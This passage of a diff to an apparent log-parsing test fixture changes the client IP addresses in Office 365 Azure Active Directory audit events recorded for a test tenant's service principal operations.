"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3891,9 +3891,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:47", "ExtendedProperties": [ { @@ -4127,7 +4127,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4157,9 +4157,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:47", "ExtendedProperties": [ { @@ -4393,7 +4393,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@